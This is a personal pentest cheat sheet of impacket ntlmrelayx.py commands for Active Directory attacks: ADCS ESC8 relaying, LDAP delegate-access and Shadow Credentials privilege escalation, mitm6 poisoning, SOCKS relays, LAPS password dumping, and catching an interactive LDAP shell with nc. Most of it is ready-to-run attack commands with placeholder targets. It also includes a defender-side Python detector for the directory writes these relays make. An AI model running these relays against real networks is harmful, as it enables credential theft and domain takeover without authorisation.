# ntlmrelayx.py

ntlmrelayx.py is part of impacket.
## Logging output

```bash
ntlmrelayx YOUR-COMMANDS --output-file output.log
```

Need to revisit this - I think this only captures hashes
## Relaying with ADCS ESC8 attack

```bash
ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
```
## Escalate privileges via relay

If you've already added a computer record to the environment (using something like powermad), you may be able to relay to LDAP and assign escalated privileges to that computer object! For example:

```bash
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
```

Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!
## Delegate access attack while poisoning with mitm6

```bash
ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access
```
## Setup SOCKS relay to a list of hosts

In this example we have a targets.txt file full of entries like this:

```
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
```

We set up the SOCKS relay like so:

```bash
ntlmrelayx.py -tf targets.txt -smb2support -socks
```
## Dumping LAPS passwords

If you just want to set up a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify that you want to dump LAPS passwords:

```bash
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
```
## Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint Security.
### Find hosts with WebClient running

The webclientservicescanner works well for this.
### Add a rogue DNS record pointing to your machine

Try dnstool.py for this.
### Setup relay for the Shadow Credentials attack

```bash
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
```
### Trigger HTTP auth from VICTIMS

Head to our coercer page for more info.
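As an added, defender-side example (not code from the original page or from impacket), here is a small Python detector for the directory writes that the `--delegate-access` and `--shadow-credentials` relays above perform; the event lines are constructed, and the flattened key=value layout of the 5136/4741 records is an assumption.

```python
import re
from typing import Dict, List

# Attributes written by the LDAP relay options on this page:
# --delegate-access sets RBCD on the relayed computer object and
# --shadow-credentials adds a key credential to the --shadow-target object.
SENSITIVE_ATTRIBUTES = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD write (delegate-access)",
    "msDS-KeyCredentialLink": "key credential write (shadow credentials)",
}

# Constructed sample records shaped like Windows Security events 5136
# (directory object modified) and 4741 (computer account created),
# flattened to one key=value line each. Not real log data.
SAMPLE_EVENTS = """\
EventID=5136 SubjectUserName=FILESRV01$ ObjectDN=CN=FILESRV01,CN=Computers,DC=domain,DC=com AttributeLDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity
EventID=5136 SubjectUserName=svc_backup ObjectDN=CN=WS01,CN=Computers,DC=domain,DC=com AttributeLDAPDisplayName=description
EventID=5136 SubjectUserName=jdoe ObjectDN=CN=DC01,OU=Domain Controllers,DC=domain,DC=com AttributeLDAPDisplayName=msDS-KeyCredentialLink
EventID=4741 SubjectUserName=jdoe ObjectDN=CN=ROGUEPC,CN=Computers,DC=domain,DC=com
"""
# key=value pairs; a value runs until the next " key=" so DNs with spaces survive
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

def parse_event(line: str) -> Dict[str, str]:
    return dict(FIELD_RE.findall(line))

def object_name(dn: str) -> str:
    """First RDN value of a DN: 'CN=WS01,CN=Computers,...' -> 'WS01'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def detect_relay_writes(log_text: str) -> List[Dict[str, object]]:
    """One alert per event that looks like an ntlmrelayx-style LDAP write."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") == "4741":
            alerts.append({"reason": "computer account created",
                           "subject": ev["SubjectUserName"],
                           "object": object_name(ev["ObjectDN"])})
        elif ev.get("EventID") == "5136":
            attr = ev.get("AttributeLDAPDisplayName", "")
            if attr in SENSITIVE_ATTRIBUTES:
                target = object_name(ev["ObjectDN"])
                alerts.append({"reason": SENSITIVE_ATTRIBUTES[attr],
                               "subject": ev["SubjectUserName"], "object": target,
                               # a machine account rewriting its own attribute is
                               # what a relayed coerced authentication looks like
                               "self_write": ev["SubjectUserName"].rstrip("$") == target})
    return alerts
```

Run `detect_relay_writes(SAMPLE_EVENTS)` to get three alerts: the self-write of RBCD by FILESRV01$, the key credential write on DC01, and the new ROGUEPC computer account; the plain `description` change is ignored.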
## Shadow Credentials attack (with LDAP shell)

I followed these instructions to pwn a HBT: Mist machine for this.
### Get a venv set up

```bash
python3 -m venv venv
source venv/bin/activate
```
### Install the appropriate impacket fork

```bash
git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
```
### Run ntlmrelayx with sudo permissions:

```bash
sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -t ldap://ip.of.a.dc -i
```
### Be ready to "catch" the relay

```bash
nc 127.0.0.1 11000
```